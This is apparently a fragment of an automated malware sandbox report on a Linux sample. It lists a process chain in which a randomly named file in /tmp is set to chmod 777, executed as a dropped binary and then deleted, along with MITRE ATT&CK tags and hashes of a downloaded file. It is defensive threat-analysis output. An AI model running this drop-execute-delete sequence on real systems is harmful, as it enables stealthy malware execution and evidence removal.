PID:1003
-
-
/bin/chmodchmod 777 YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- File and Directory Permissions Modification
PID:1004
-
-
/tmp/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO./YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- Executes dropped EXE
PID:1005
-
-
/bin/rmrm YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵PID:1006
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97